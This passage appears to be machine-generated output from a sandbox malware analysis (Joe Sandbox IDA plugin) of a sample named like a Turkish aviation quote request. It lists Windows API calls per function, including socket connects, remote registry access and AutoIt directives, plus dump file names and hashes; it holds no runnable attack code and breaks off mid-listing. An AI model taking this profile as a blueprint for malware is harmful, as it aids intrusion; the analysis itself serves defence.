                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01026386
                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010263B0
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 010263C1
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010263DB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                    • Opcode ID: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
                                                                                                                                    • Instruction ID: a0cd9cc8f516fa830dcf4a04641b0e5f4e5b8e5cecf17d0401e1a6171c96aecf
                                                                                                                                    • Opcode Fuzzy Hash: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
                                                                                                                                    • Instruction Fuzzy Hash: DC310730644161AFDB31CF28D888F553BE5FB4A754F1941A4F9819F2B6CB77A840CB91
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB2E
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB54
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00FFDB57
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00FFDB75
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00FFDB7E
                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDBA3
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00FFDBB1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                    • Opcode ID: 3b9069c3879e5722a5a2f9a96a378d0dd44a67d488f8f55a8803a91207631cb0
                                                                                                                                    • Instruction ID: 6c98e479e9498a9b34798d622ea77d7696d21af411ecbaeb46109a8a44e69b6d
                                                                                                                                    • Opcode Fuzzy Hash: 3b9069c3879e5722a5a2f9a96a378d0dd44a67d488f8f55a8803a91207631cb0
                                                                                                                                    • Instruction Fuzzy Hash: 8421A63260121EAFDF20DEA8DC48DBB73ADEF49360B118125FB54DB260DB749C419760
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010161C6
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010161D5
                                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0101620E
                                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 01016217
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 01016221
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0101624A
                                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01016263
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 910771015-0
                                                                                                                                    • Opcode ID: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
                                                                                                                                    • Instruction ID: e44cc9e17ddb805c9d592ac74007e8f52cec98289fd4f32f8f32af409a4e0de8
                                                                                                                                    • Opcode Fuzzy Hash: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
                                                                                                                                    • Instruction Fuzzy Hash: 6731A171600118ABEF20AF64CC85BBE7BF9EF45750F044069FD85E7285CBB9A9049BA1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                                    • Opcode ID: 6aae3f584cb7cf06d0bc9a1f9e3c86583d0db75c629667d7d0a9fe2c32cbba69
                                                                                                                                    • Instruction ID: 34ace9235c638d792dbf6dc840b31eceb992e276c6fc6802969d22c40a5dfed0
                                                                                                                                    • Opcode Fuzzy Hash: 6aae3f584cb7cf06d0bc9a1f9e3c86583d0db75c629667d7d0a9fe2c32cbba69
                                                                                                                                    • Instruction Fuzzy Hash: 8F2149736141166AD320BA34AD03FB7B398DF55360F14403DF686CA171EF949D4AF295
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC09
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC2F
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00FFDC32
                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00FFDC53
                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00FFDC5C
                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDC76
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00FFDC84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                    • Opcode ID: 552912cc26df7ad9593fdbe372d52715fdc09e831e818826838297ff5e9aefd7
                                                                                                                                    • Instruction ID: 11f520a9d4a581ef7f1d8862194e8675121918c7e6944f2019cdf7065ce80097
                                                                                                                                    • Opcode Fuzzy Hash: 552912cc26df7ad9593fdbe372d52715fdc09e831e818826838297ff5e9aefd7
                                                                                                                                    • Instruction Fuzzy Hash: 30218636604209AFDB20EFA8DC89DBA77EDEF09360B108125FA54CB264DBB4DC41D764
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                                                                                      • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                                                                                      • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01027632
                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0102763F
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0102764A
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01027659
                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01027665
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                    • Opcode ID: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                                                                                    • Instruction ID: 258b1657aef3fd019504b4574eb3f18b552b0a85395112dc721080bcd1c60927
                                                                                                                                    • Opcode Fuzzy Hash: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                                                                                    • Instruction Fuzzy Hash: D11193B111012ABFEF258E64CC85EE7BF6DEF08798F014114FA44A6050C6729C21DBA4
                                                                                                                                    APIs
                                                                                                                                    • __init_pointers.LIBCMT ref: 00FC9AE6
                                                                                                                                      • Part of subcall function 00FC3187: EncodePointer.KERNEL32(00000000), ref: 00FC318A
                                                                                                                                      • Part of subcall function 00FC3187: __initp_misc_winsig.LIBCMT ref: 00FC31A5
                                                                                                                                      • Part of subcall function 00FC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FC9EA0
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FC9EB4
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FC9EC7
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FC9EDA
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FC9EED
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FC9F00
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FC9F13
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FC9F26
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FC9F39
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FC9F4C
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FC9F5F
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FC9F72
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FC9F85
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FC9F98
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FC9FAB
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FC9FBE
                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00FC9AEB
                                                                                                                                    • __mtterm.LIBCMT ref: 00FC9AF4
                                                                                                                                      • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C56
                                                                                                                                      • Part of subcall function 00FC9B5C: _free.LIBCMT ref: 00FC9C5D
                                                                                                                                      • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(0105EC00,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C7F
                                                                                                                                    • __calloc_crt.LIBCMT ref: 00FC9B19
                                                                                                                                    • __initptd.LIBCMT ref: 00FC9B3B
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FC9B42
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3567560977-0
                                                                                                                                    • Opcode ID: 19507a288ad31386a679fd52407f2a54589442eaf90ef81f7a9f3ebb664dbaee
                                                                                                                                    • Instruction ID: e5301339d7c1a4a54dc5c0d84ffb0a2ad38c256bf3a9407d393d05aa4dfd9f86
                                                                                                                                    • Opcode Fuzzy Hash: 19507a288ad31386a679fd52407f2a54589442eaf90ef81f7a9f3ebb664dbaee
                                                                                                                                    • Instruction Fuzzy Hash: A2F0C23290D31329E7347A74BE0BF4A36909F42770B20061EF094950C2EE999A0125A0
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FC3F85), ref: 00FC4085
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00FC408C
                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00FC4097
                                                                                                                                    • DecodePointer.KERNEL32(00FC3F85), ref: 00FC40B2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                    • Opcode ID: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
                                                                                                                                    • Instruction ID: 0aebefceb2c16af2d5b602e3f00290f836a4859c45b619b2e4bb881455c20f9f
                                                                                                                                    • Opcode Fuzzy Hash: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
                                                                                                                                    • Instruction Fuzzy Hash: 53E09270981202EBEA30AF61EA0EB053AB8B705B92F204018F986ED098CBBB5504DB54
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253778849-0
                                                                                                                                    • Opcode ID: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                                    • Instruction ID: 0f0234533335a57dbc326ad9f8133a926bb2c163b275252000c0cd977e86ec70
                                                                                                                                    • Opcode Fuzzy Hash: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                                    • Instruction Fuzzy Hash: 3F61CF7050024A9BDF02EF64CC82EFF3BA5AF0A308F044469F9955B1D2DB79D916DB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010202BD
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010202FD
                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01020320
                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01020349
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0102038C
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01020399
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4046560759-0
                                                                                                                                    • Opcode ID: efb418e959f2c24b80ce309a98813be1f9ca5d3f371f7181aa1fa34c9a3755fa
                                                                                                                                    • Instruction ID: 17931b4555c1dedf5b667de9c7502c10ff964a3658a7219a8a9c23d8fe2e5da5
                                                                                                                                    • Opcode Fuzzy Hash: efb418e959f2c24b80ce309a98813be1f9ca5d3f371f7181aa1fa34c9a3755fa
                                                                                                                                    • Instruction Fuzzy Hash: 9F515571208305AFD710EF28C885EAFBBE8EF89314F04491DF5858B2A1DB75E909DB52
                                                                                                                                    APIs
                                                                                                                                    • GetMenu.USER32(?), ref: 010257FB
                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 01025832
                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0102585A
                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 010258C9
                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 010258D7
                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 01025928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 650687236-0
                                                                                                                                    • Opcode ID: 28628b537628f9b95c67806f7328c53ff5572a0d46b2c4148c086914bfabf5ff
                                                                                                                                    • Instruction ID: eaa01e01b76b0f6e83b2c562c7df1506496437ab6b578fb1425cd1ce586ffe9c
                                                                                                                                    • Opcode Fuzzy Hash: 28628b537628f9b95c67806f7328c53ff5572a0d46b2c4148c086914bfabf5ff
                                                                                                                                    • Instruction Fuzzy Hash: A7517F71E00226AFCF11DF64CC45AEEBBB4EF49310F144099E981BB351CBB9AE419B94
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FFEF06
                                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00FFEF78
                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00FFEFD3
                                                                                                                                    • _memmove.LIBCMT ref: 00FFEFFD
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FFF04A
                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FFF078
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1101466143-0
                                                                                                                                    • Opcode ID: e3c4fe555d601ac9e5627848f5c3e0e087bb44631d8c843c454289a0f9d45e4b
                                                                                                                                    • Instruction ID: 87d22d2792bca9a2094b3918c53816edda0f0403a2904b3e1fab91cd4fb2ff44
                                                                                                                                    • Opcode Fuzzy Hash: e3c4fe555d601ac9e5627848f5c3e0e087bb44631d8c843c454289a0f9d45e4b
                                                                                                                                    • Instruction Fuzzy Hash: F7517CB5A00209DFCB20CF58C880AAAB7B8FF4C310B158569EA49DB315E735E911CBA0
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002258
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010022A3
                                                                                                                                    • IsMenu.USER32(00000000), ref: 010022C3
                                                                                                                                    • CreatePopupMenu.USER32 ref: 010022F7
